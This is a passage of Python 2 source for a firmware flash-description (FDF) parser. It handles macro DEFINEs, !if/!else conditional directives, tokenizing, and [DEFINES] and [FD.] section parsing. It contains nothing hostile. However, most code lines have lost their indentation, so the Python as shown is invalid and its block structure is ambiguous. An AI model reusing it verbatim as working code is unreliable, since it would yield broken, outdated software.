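    # GetRealFileLine() can still report errors against Common.fdf.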
    ## PreprocessConditionalStatement() method
    #
    #   Preprocess DEFINE statements and conditional directives (!if/!ifdef/!ifndef/!elseif/!else/!endif), recording false branches for wipe-off.
# In the end, rewind the file buffer pointer to the beginning
#
# @param self The object pointer
#
def PreprocessConditionalStatement(self):
# IfList is a stack of if branches with elements of list [Pos, CondSatisfied, BranchDetermined]
IfList = []
while self.__GetNextToken():
if self.__Token == 'DEFINE':
DefineLine = self.CurrentLineNumber - 1
DefineOffset = self.CurrentOffsetWithinLine - len('DEFINE')
if not self.__GetNextToken():
raise Warning("expected Macro name At Line ", self.FileName, self.CurrentLineNumber)
Macro = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
pass
Value = self.__Token
if not Macro in InputMacroDict:
FileLineTuple = GetRealFileLine(self.FileName, DefineLine + 1)
MacProfile = MacroProfile(FileLineTuple[0], FileLineTuple[1])
MacProfile.MacroName = Macro
MacProfile.MacroValue = Value
AllMacroList.append(MacProfile)
self.__WipeOffArea.append(((DefineLine, DefineOffset), (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
elif self.__Token in ('!ifdef', '!ifndef', '!if'):
IfStartPos = (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - len(self.__Token))
IfList.append([IfStartPos, None, None])
CondLabel = self.__Token
MacroName, NotFlag = self.__GetMacroName()
NotDefineFlag = False
if CondLabel == '!ifndef':
NotDefineFlag = True
if CondLabel == '!ifdef' or CondLabel == '!ifndef':
if NotFlag:
raise Warning("'NOT' operation not allowed for Macro name At Line ", self.FileName, self.CurrentLineNumber)
if CondLabel == '!if':
if not self.__GetNextOp():
raise Warning("expected !endif At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token in ('!=', '==', '>', '<', '>=', '<='):
Op = self.__Token
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
pass
MacroValue = self.__Token
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, Op, MacroValue)
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
BranchDetermined = ConditionSatisfied
else:
self.CurrentOffsetWithinLine -= len(self.__Token)
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, None, 'Bool')
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
BranchDetermined = ConditionSatisfied
IfList[-1] = [IfList[-1][0], ConditionSatisfied, BranchDetermined]
if ConditionSatisfied:
self.__WipeOffArea.append((IfList[-1][0], (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
else:
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1)
if NotDefineFlag:
ConditionSatisfied = not ConditionSatisfied
BranchDetermined = ConditionSatisfied
IfList[-1] = [IfList[-1][0], ConditionSatisfied, BranchDetermined]
if ConditionSatisfied:
self.__WipeOffArea.append((IfStartPos, (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
elif self.__Token in ('!elseif', '!else'):
ElseStartPos = (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - len(self.__Token))
if len(IfList) <= 0:
raise Warning("Missing !if statement At Line ", self.FileName, self.CurrentLineNumber)
if IfList[-1][1]:
IfList[-1] = [ElseStartPos, False, True]
self.__WipeOffArea.append((ElseStartPos, (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
else:
self.__WipeOffArea.append((IfList[-1][0], ElseStartPos))
IfList[-1] = [ElseStartPos, True, IfList[-1][2]]
if self.__Token == '!elseif':
MacroName, NotFlag = self.__GetMacroName()
if not self.__GetNextOp():
raise Warning("expected !endif At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token in ('!=', '==', '>', '<', '>=', '<='):
Op = self.__Token
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
pass
MacroValue = self.__Token
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, Op, MacroValue)
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
else:
self.CurrentOffsetWithinLine -= len(self.__Token)
ConditionSatisfied = self.__EvaluateConditional(MacroName, IfList[-1][0][0] + 1, None, 'Bool')
if NotFlag:
ConditionSatisfied = not ConditionSatisfied
IfList[-1] = [IfList[-1][0], ConditionSatisfied, IfList[-1][2]]
if IfList[-1][1]:
if IfList[-1][2]:
IfList[-1][1] = False
else:
IfList[-1][2] = True
self.__WipeOffArea.append((IfList[-1][0], (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
elif self.__Token == '!endif':
if IfList[-1][1]:
self.__WipeOffArea.append(((self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - len('!endif')), (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
else:
self.__WipeOffArea.append((IfList[-1][0], (self.CurrentLineNumber - 1, self.CurrentOffsetWithinLine - 1)))
IfList.pop()
if len(IfList) > 0:
raise Warning("Missing !endif At Line ", self.FileName, self.CurrentLineNumber)
self.Rewind()
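    # Illustrative sketch only, for a hypothetical FDF fragment:
    #   DEFINE SECURE_BOOT = TRUE
    #   !if $(SECURE_BOOT) == TRUE
    #     <statements kept>
    #   !else
    #     <statements discarded>
    #   !endif
    # The DEFINE line, the directives and the losing branch are appended to
    # self.__WipeOffArea and blanked out later by __ReplaceFragment() in ParseFile().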
def __EvaluateConditional(self, Name, Line, Op = None, Value = None):
FileLineTuple = GetRealFileLine(self.FileName, Line)
if Name in InputMacroDict:
MacroValue = InputMacroDict[Name]
if Op == None:
                if Value == 'Bool' and (MacroValue == None or MacroValue.upper() == 'FALSE'):
return False
return True
elif Op == '!=':
if Value != MacroValue:
return True
else:
return False
elif Op == '==':
if Value == MacroValue:
return True
else:
return False
else:
if (self.__IsHex(Value) or Value.isdigit()) and (self.__IsHex(MacroValue) or (MacroValue != None and MacroValue.isdigit())):
InputVal = long(Value, 0)
MacroVal = long(MacroValue, 0)
if Op == '>':
if MacroVal > InputVal:
return True
else:
return False
elif Op == '>=':
if MacroVal >= InputVal:
return True
else:
return False
elif Op == '<':
if MacroVal < InputVal:
return True
else:
return False
elif Op == '<=':
if MacroVal <= InputVal:
return True
else:
return False
else:
return False
else:
raise Warning("Value %s is not a number At Line ", self.FileName, Line)
for Profile in AllMacroList:
if Profile.FileName == FileLineTuple[0] and Profile.MacroName == Name and Profile.DefinedAtLine <= FileLineTuple[1]:
if Op == None:
                    if Value == 'Bool' and (Profile.MacroValue == None or Profile.MacroValue.upper() == 'FALSE'):
return False
return True
elif Op == '!=':
if Value != Profile.MacroValue:
return True
else:
return False
elif Op == '==':
if Value == Profile.MacroValue:
return True
else:
return False
else:
if (self.__IsHex(Value) or Value.isdigit()) and (self.__IsHex(Profile.MacroValue) or (Profile.MacroValue != None and Profile.MacroValue.isdigit())):
InputVal = long(Value, 0)
MacroVal = long(Profile.MacroValue, 0)
if Op == '>':
if MacroVal > InputVal:
return True
else:
return False
elif Op == '>=':
if MacroVal >= InputVal:
return True
else:
return False
elif Op == '<':
if MacroVal < InputVal:
return True
else:
return False
elif Op == '<=':
if MacroVal <= InputVal:
return True
else:
return False
else:
return False
else:
raise Warning("Value %s is not a number At Line ", self.FileName, Line)
return False
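    # Rough behaviour sketch: __EvaluateConditional('SECURE_BOOT', Line, '==', 'TRUE')
    # looks the macro up first in InputMacroDict (command-line values win), then in
    # AllMacroList entries defined in the same file at or before the given line; string
    # operators (==, !=) compare text, the others (>, >=, <, <=) require numeric values.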
## __IsToken() method
#
# Check whether input string is found from current char position along
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @param String The string to search
# @param IgnoreCase Indicate case sensitive/non-sensitive search, default is case sensitive
# @retval True Successfully find string, file buffer pointer moved forward
# @retval False Not able to find string, file buffer pointer not changed
#
def __IsToken(self, String, IgnoreCase = False):
self.__SkipWhiteSpace()
# Only consider the same line, no multi-line token allowed
StartPos = self.CurrentOffsetWithinLine
index = -1
if IgnoreCase:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].upper().find(String.upper())
else:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].find(String)
if index == 0:
self.CurrentOffsetWithinLine += len(String)
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
return False
## __IsKeyword() method
#
    #   Check whether the input keyword is found starting at the current char position, whole word only!
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @param Keyword The string to search
# @param IgnoreCase Indicate case sensitive/non-sensitive search, default is case sensitive
# @retval True Successfully find string, file buffer pointer moved forward
# @retval False Not able to find string, file buffer pointer not changed
#
def __IsKeyword(self, KeyWord, IgnoreCase = False):
self.__SkipWhiteSpace()
# Only consider the same line, no multi-line token allowed
StartPos = self.CurrentOffsetWithinLine
index = -1
if IgnoreCase:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].upper().find(KeyWord.upper())
else:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].find(KeyWord)
if index == 0:
followingChar = self.__CurrentLine()[self.CurrentOffsetWithinLine + len(KeyWord)]
if not str(followingChar).isspace() and followingChar not in SEPERATOR_TUPLE:
return False
self.CurrentOffsetWithinLine += len(KeyWord)
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
return False
## __GetNextWord() method
#
# Get next C name from file lines
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a C name string, file buffer pointer moved forward
# @retval False Not able to find a C name string, file buffer pointer not changed
#
def __GetNextWord(self):
self.__SkipWhiteSpace()
if self.__EndOfFile():
return False
TempChar = self.__CurrentChar()
StartPos = self.CurrentOffsetWithinLine
if (TempChar >= 'a' and TempChar <= 'z') or (TempChar >= 'A' and TempChar <= 'Z') or TempChar == '_':
self.__GetOneChar()
while not self.__EndOfLine():
TempChar = self.__CurrentChar()
if (TempChar >= 'a' and TempChar <= 'z') or (TempChar >= 'A' and TempChar <= 'Z') \
or (TempChar >= '0' and TempChar <= '9') or TempChar == '_' or TempChar == '-':
self.__GetOneChar()
else:
break
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
return False
## __GetNextToken() method
#
    #   Get next token unit before a separator
# If found, the string value is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a token unit, file buffer pointer moved forward
# @retval False Not able to find a token unit, file buffer pointer not changed
#
def __GetNextToken(self):
# Skip leading spaces, if exist.
self.__SkipWhiteSpace()
if self.__EndOfFile():
return False
# Record the token start position, the position of the first non-space char.
StartPos = self.CurrentOffsetWithinLine
StartLine = self.CurrentLineNumber
while not self.__EndOfLine():
TempChar = self.__CurrentChar()
            # Try to find the end char that is not a space and not in the separator tuple.
            # That is, when we hit a space or any char in the tuple, we have reached the end of the token.
if not str(TempChar).isspace() and TempChar not in SEPERATOR_TUPLE:
self.__GetOneChar()
            # If we happen to meet a separator as the first char, we must proceed to get it.
            # That is, we get a token that is a separator char; normally it is the boundary of other tokens.
elif StartPos == self.CurrentOffsetWithinLine and TempChar in SEPERATOR_TUPLE:
self.__GetOneChar()
break
else:
break
# else:
# return False
EndPos = self.CurrentOffsetWithinLine
if self.CurrentLineNumber != StartLine:
EndPos = len(self.Profile.FileLinesList[StartLine-1])
self.__Token = self.Profile.FileLinesList[StartLine-1][StartPos : EndPos]
if StartPos != self.CurrentOffsetWithinLine:
return True
else:
return False
def __GetNextOp(self):
# Skip leading spaces, if exist.
self.__SkipWhiteSpace()
if self.__EndOfFile():
return False
# Record the token start position, the position of the first non-space char.
StartPos = self.CurrentOffsetWithinLine
while not self.__EndOfLine():
TempChar = self.__CurrentChar()
# Try to find the end char that is not a space
if not str(TempChar).isspace():
self.__GetOneChar()
else:
break
else:
return False
if StartPos != self.CurrentOffsetWithinLine:
self.__Token = self.__CurrentLine()[StartPos : self.CurrentOffsetWithinLine]
return True
else:
return False
## __GetNextGuid() method
#
    #   Get next token unit before a separator
# If found, the GUID string is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a registry format GUID, file buffer pointer moved forward
# @retval False Not able to find a registry format GUID, file buffer pointer not changed
#
def __GetNextGuid(self):
if not self.__GetNextToken():
return False
p = re.compile('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}')
if p.match(self.__Token) != None:
return True
else:
self.__UndoToken()
return False
## __UndoToken() method
#
# Go back one token unit in file buffer
#
# @param self The object pointer
#
def __UndoToken(self):
self.__UndoOneChar()
while self.__CurrentChar().isspace():
if not self.__UndoOneChar():
self.__GetOneChar()
return
StartPos = self.CurrentOffsetWithinLine
CurrentLine = self.CurrentLineNumber
while CurrentLine == self.CurrentLineNumber:
TempChar = self.__CurrentChar()
            # Try to find the end char that is not a space and not in the separator tuple.
            # That is, when we hit a space or any char in the tuple, we have reached the end of the token.
if not str(TempChar).isspace() and not TempChar in SEPERATOR_TUPLE:
if not self.__UndoOneChar():
break
            # If we happen to meet a separator as the first char, we must proceed to get it.
            # That is, we get a token that is a separator char; normally it is the boundary of other tokens.
elif StartPos == self.CurrentOffsetWithinLine and TempChar in SEPERATOR_TUPLE:
return
else:
break
self.__GetOneChar()
## __HexDigit() method
#
# Whether char input is a Hex data bit
#
# @param self The object pointer
# @param TempChar The char to test
# @retval True The char is a Hex data bit
# @retval False The char is NOT a Hex data bit
#
def __HexDigit(self, TempChar):
if (TempChar >= 'a' and TempChar <= 'f') or (TempChar >= 'A' and TempChar <= 'F') \
or (TempChar >= '0' and TempChar <= '9'):
return True
else:
return False
def __IsHex(self, HexStr):
if not HexStr.upper().startswith("0X"):
return False
if len(self.__Token) <= 2:
return False
charList = [c for c in HexStr[2 : ] if not self.__HexDigit( c)]
if len(charList) == 0:
return True
else:
return False
## __GetNextHexNumber() method
#
    #   Get next HEX data before a separator
# If found, the HEX data is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a HEX data, file buffer pointer moved forward
# @retval False Not able to find a HEX data, file buffer pointer not changed
#
def __GetNextHexNumber(self):
if not self.__GetNextToken():
return False
if self.__IsHex(self.__Token):
return True
else:
self.__UndoToken()
return False
## __GetNextDecimalNumber() method
#
    #   Get next decimal data before a separator
# If found, the decimal data is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a decimal data, file buffer pointer moved forward
# @retval False Not able to find a decimal data, file buffer pointer not changed
#
def __GetNextDecimalNumber(self):
if not self.__GetNextToken():
return False
if self.__Token.isdigit():
return True
else:
self.__UndoToken()
return False
## __GetNextPcdName() method
#
    #   Get next PCD token space C name and PCD C name pair before a separator
    #   If found, the (PcdCName, PcdTokenSpaceCName) pair is returned
#
# @param self The object pointer
# @retval Tuple PCD C name and PCD token space C name pair
#
def __GetNextPcdName(self):
if not self.__GetNextWord():
raise Warning("expected PcdTokenSpaceCName.PcdCName At Line ", self.FileName, self.CurrentLineNumber)
pcdTokenSpaceCName = self.__Token
if not self.__IsToken( "."):
raise Warning("expected PcdTokenSpaceCName.PcdCName At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected PcdTokenSpaceCName.PcdCName At Line ", self.FileName, self.CurrentLineNumber)
pcdCName = self.__Token
return (pcdCName, pcdTokenSpaceCName)
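    # Illustrative sketch only: for the hypothetical input "gMyTokenSpaceGuid.PcdFlashSize"
    # this returns ('PcdFlashSize', 'gMyTokenSpaceGuid'), i.e. (PcdCName, PcdTokenSpaceCName);
    # a malformed dotted pair raises Warning.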
## __GetStringData() method
#
# Get string contents quoted in ""
    #   If found, the string data is put into self.__Token
#
# @param self The object pointer
# @retval True Successfully find a string data, file buffer pointer moved forward
# @retval False Not able to find a string data, file buffer pointer not changed
#
def __GetStringData(self):
if self.__Token.startswith("\"") or self.__Token.startswith("L\""):
self.__UndoToken()
self.__SkipToToken("\"")
currentLineNumber = self.CurrentLineNumber
if not self.__SkipToToken("\""):
raise Warning("Missing Quote \" for String At Line ", self.FileName, self.CurrentLineNumber)
if currentLineNumber != self.CurrentLineNumber:
raise Warning("Missing Quote \" for String At Line ", self.FileName, self.CurrentLineNumber)
self.__Token = self.__SkippedChars.rstrip('\"')
return True
elif self.__Token.startswith("\'") or self.__Token.startswith("L\'"):
self.__UndoToken()
self.__SkipToToken("\'")
currentLineNumber = self.CurrentLineNumber
if not self.__SkipToToken("\'"):
raise Warning("Missing Quote \' for String At Line ", self.FileName, self.CurrentLineNumber)
if currentLineNumber != self.CurrentLineNumber:
raise Warning("Missing Quote \' for String At Line ", self.FileName, self.CurrentLineNumber)
self.__Token = self.__SkippedChars.rstrip('\'')
return True
else:
return False
## __SkipToToken() method
#
# Search forward in file buffer for the string
# The skipped chars are put into self.__SkippedChars
#
# @param self The object pointer
# @param String The string to search
# @param IgnoreCase Indicate case sensitive/non-sensitive search, default is case sensitive
# @retval True Successfully find the string, file buffer pointer moved forward
# @retval False Not able to find the string, file buffer pointer not changed
#
def __SkipToToken(self, String, IgnoreCase = False):
StartPos = self.GetFileBufferPos()
self.__SkippedChars = ""
while not self.__EndOfFile():
index = -1
if IgnoreCase:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].upper().find(String.upper())
else:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].find(String)
if index == 0:
self.CurrentOffsetWithinLine += len(String)
self.__SkippedChars += String
return True
self.__SkippedChars += str(self.__CurrentChar())
self.__GetOneChar()
self.SetFileBufferPos( StartPos)
self.__SkippedChars = ""
return False
## GetFileBufferPos() method
#
# Return the tuple of current line and offset within the line
#
# @param self The object pointer
# @retval Tuple Line number and offset pair
#
def GetFileBufferPos(self):
return (self.CurrentLineNumber, self.CurrentOffsetWithinLine)
## SetFileBufferPos() method
#
# Restore the file buffer position
#
# @param self The object pointer
# @param Pos The new file buffer position
#
def SetFileBufferPos(self, Pos):
(self.CurrentLineNumber, self.CurrentOffsetWithinLine) = Pos
## ParseFile() method
#
# Parse the file profile buffer to extract fd, fv ... information
# Exception will be raised if syntax error found
#
# @param self The object pointer
#
def ParseFile(self):
try:
self.__StringToList()
self.PreprocessFile()
self.PreprocessIncludeFile()
self.__StringToList()
self.PreprocessFile()
self.PreprocessConditionalStatement()
self.__StringToList()
for Pos in self.__WipeOffArea:
self.__ReplaceFragment(Pos[0], Pos[1])
self.Profile.FileLinesList = ["".join(list) for list in self.Profile.FileLinesList]
while self.__GetDefines():
pass
Index = 0
while Index < len(self.Profile.FileLinesList):
FileLineTuple = GetRealFileLine(self.FileName, Index + 1)
self.Profile.FileLinesList[Index] = self.__ReplaceMacros(self.Profile.FileLinesList[Index], FileLineTuple[0], FileLineTuple[1])
Index += 1
while self.__GetFd():
pass
while self.__GetFv():
pass
while self.__GetCapsule():
pass
# while self.__GetVtf():
# pass
#
# while self.__GetRule():
# pass
except Warning, X:
self.__UndoToken()
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
X.message += '\nGot Token: \"%s\" from File %s\n' % (self.__Token, FileLineTuple[0]) + \
'Previous Token: \"%s\" At line: %d, Offset Within Line: %d\n' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :].rstrip('\n').rstrip('\r'), FileLineTuple[1], self.CurrentOffsetWithinLine)
raise
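    # Minimal usage sketch (assumes an FDF file path; hypothetical names):
    #
    #   Parser = FdfParser('Platform.fdf')
    #   try:
    #       Parser.ParseFile()
    #   except Warning, Err:
    #       print Err.FileName, Err.LineNumber, Err.message
    #   # Parsed data is then available in Parser.Profile.FdDict / FvDict / CapsuleList.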
## __GetDefines() method
#
# Get Defines section contents and store its data into AllMacrosList
#
# @param self The object pointer
# @retval True Successfully find a Defines
# @retval False Not able to find a Defines
#
def __GetDefines(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[DEFINES"):
if not S.startswith("[FD.") and not S.startswith("[FV.") and not S.startswith("[CAPSULE.") \
and not S.startswith("[VTF.") and not S.startswith("[RULE.") and not S.startswith("[OPTIONROM."):
raise Warning("Unknown section or section appear sequence error (The correct sequence should be [DEFINES], [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[DEFINES", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
#print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
# % (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [DEFINES", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "]"):
raise Warning("expected ']'", self.FileName, self.CurrentLineNumber)
while self.__GetNextWord():
Macro = self.__Token
if not self.__IsToken("="):
raise Warning("expected '='", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken() or self.__Token.startswith('['):
raise Warning("expected MACRO value", self.FileName, self.CurrentLineNumber)
Value = self.__Token
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
MacProfile = MacroProfile(FileLineTuple[0], FileLineTuple[1])
MacProfile.MacroName = Macro
MacProfile.MacroValue = Value
AllMacroList.append(MacProfile)
return False
## __GetFd() method
#
# Get FD section contents and store its data into FD dictionary of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a FD
# @retval False Not able to find a FD
#
def __GetFd(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[FD."):
if not S.startswith("[FV.") and not S.startswith("[CAPSULE.") \
and not S.startswith("[VTF.") and not S.startswith("[RULE."):
raise Warning("Unknown section At Line ", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[FD.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [FD.] At Line ", self.FileName, self.CurrentLineNumber)
FdName = self.__GetUiName()
self.CurrentFdName = FdName.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
FdObj = CommonDataClass.FdfClass.FDClassObject()
FdObj.FdUiName = self.CurrentFdName
self.Profile.FdDict[self.CurrentFdName] = FdObj
Status = self.__GetCreateFile(FdObj)
if not Status:
raise Warning("FD name error At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetTokenStatements(FdObj):
return False
self.__GetDefineStatements(FdObj)
self.__GetSetStatements(FdObj)
if not self.__GetRegionLayout(FdObj):
raise Warning("expected region layout At Line ", self.FileName, self.CurrentLineNumber)
while self.__GetRegionLayout(FdObj):
pass
return True
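    # Illustrative sketch only -- a hypothetical [FD.] section in the shape this method accepts:
    #
    #   [FD.MyFlash]
    #   BaseAddress   = 0xFFF00000
    #   Size          = 0x00100000
    #   ErasePolarity = 1
    #   BlockSize     = 0x1000
    #   NumBlocks     = 0x100
    #   0x000000|0x040000
    #   FV = FVMAIN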
## __GetUiName() method
#
# Return the UI name of a section
#
# @param self The object pointer
# @retval FdName UI name
#
def __GetUiName(self):
FdName = ""
if self.__GetNextWord():
FdName = self.__Token
return FdName
## __GetCreateFile() method
#
# Return the output file name of object
#
# @param self The object pointer
# @param Obj object whose data will be stored in file
    #   @retval True        CREATE_FILE statement found; the output file name is stored in Obj.CreateFileName
#
def __GetCreateFile(self, Obj):
if self.__IsKeyword( "CREATE_FILE"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected file name At Line ", self.FileName, self.CurrentLineNumber)
FileName = self.__Token
Obj.CreateFileName = FileName
return True
## __GetTokenStatements() method
#
# Get token statements
#
# @param self The object pointer
# @param Obj for whom token statement is got
# @retval True Successfully find a token statement
# @retval False Not able to find a token statement
#
def __GetTokenStatements(self, Obj):
if not self.__IsKeyword( "BaseAddress"):
raise Warning("BaseAddress missing At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex base address At Line ", self.FileName, self.CurrentLineNumber)
Obj.BaseAddress = self.__Token
if self.__IsToken( "|"):
pcdPair = self.__GetNextPcdName()
Obj.BaseAddressPcd = pcdPair
self.Profile.PcdDict[pcdPair] = long(Obj.BaseAddress, 0)
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[pcdPair] = FileLineTuple
if not self.__IsKeyword( "Size"):
raise Warning("Size missing At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex size At Line ", self.FileName, self.CurrentLineNumber)
Obj.Size = long(self.__Token, 0)
if self.__IsToken( "|"):
pcdPair = self.__GetNextPcdName()
Obj.SizePcd = pcdPair
self.Profile.PcdDict[pcdPair] = Obj.Size
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[pcdPair] = FileLineTuple
if not self.__IsKeyword( "ErasePolarity"):
raise Warning("ErasePolarity missing At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Erase Polarity At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token != "1" and self.__Token != "0":
raise Warning("expected 1 or 0 Erase Polarity At Line ", self.FileName, self.CurrentLineNumber)
Obj.ErasePolarity = self.__Token
Status = self.__GetBlockStatements(Obj)
return Status
## __GetAddressStatements() method
#
# Get address statements
#
# @param self The object pointer
# @param Obj for whom address statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetAddressStatements(self, Obj):
if self.__IsKeyword("BsBaseAddress"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextDecimalNumber() and not self.__GetNextHexNumber():
raise Warning("expected address At Line ", self.FileName, self.CurrentLineNumber)
BsAddress = long(self.__Token, 0)
Obj.BsBaseAddress = BsAddress
if self.__IsKeyword("RtBaseAddress"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextDecimalNumber() and not self.__GetNextHexNumber():
raise Warning("expected address At Line ", self.FileName, self.CurrentLineNumber)
RtAddress = long(self.__Token, 0)
Obj.RtBaseAddress = RtAddress
## __GetBlockStatements() method
#
# Get block statements
#
# @param self The object pointer
# @param Obj for whom block statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetBlockStatements(self, Obj):
if not self.__GetBlockStatement(Obj):
            # set default block size to 1
Obj.BlockSizeList.append((1, Obj.Size, None))
return True
while self.__GetBlockStatement(Obj):
pass
for Item in Obj.BlockSizeList:
if Item[0] == None or Item[1] == None:
raise Warning("expected block statement for Fd Section", self.FileName, self.CurrentLineNumber)
return True
## __GetBlockStatement() method
#
# Get block statement
#
# @param self The object pointer
# @param Obj for whom block statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetBlockStatement(self, Obj):
if not self.__IsKeyword( "BlockSize"):
return False
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber() and not self.__GetNextDecimalNumber():
raise Warning("expected Hex block size At Line ", self.FileName, self.CurrentLineNumber)
BlockSize = long(self.__Token, 0)
BlockSizePcd = None
if self.__IsToken( "|"):
PcdPair = self.__GetNextPcdName()
BlockSizePcd = PcdPair
self.Profile.PcdDict[PcdPair] = BlockSize
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
            self.Profile.PcdFileLineDict[PcdPair] = FileLineTuple
BlockNumber = None
if self.__IsKeyword( "NumBlocks"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextDecimalNumber() and not self.__GetNextHexNumber():
raise Warning("expected block numbers At Line ", self.FileName, self.CurrentLineNumber)
BlockNumber = long(self.__Token, 0)
Obj.BlockSizeList.append((BlockSize, BlockNumber, BlockSizePcd))
return True
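    # Illustrative sketch only -- hypothetical block statements accepted here:
    #   BlockSize = 0x1000
    #   BlockSize = 0x1000|gMyTokenSpaceGuid.PcdFlashBlockSize
    #   NumBlocks = 0x100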
## __GetDefineStatements() method
#
# Get define statements
#
# @param self The object pointer
# @param Obj for whom define statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetDefineStatements(self, Obj):
while self.__GetDefineStatement( Obj):
pass
## __GetDefineStatement() method
#
# Get define statement
#
# @param self The object pointer
# @param Obj for whom define statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetDefineStatement(self, Obj):
if self.__IsKeyword("DEFINE"):
self.__GetNextToken()
Macro = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
Value = self.__Token
Macro = '$(' + Macro + ')'
Obj.DefineVarDict[Macro] = Value
return True
return False
## __GetSetStatements() method
#
# Get set statements
#
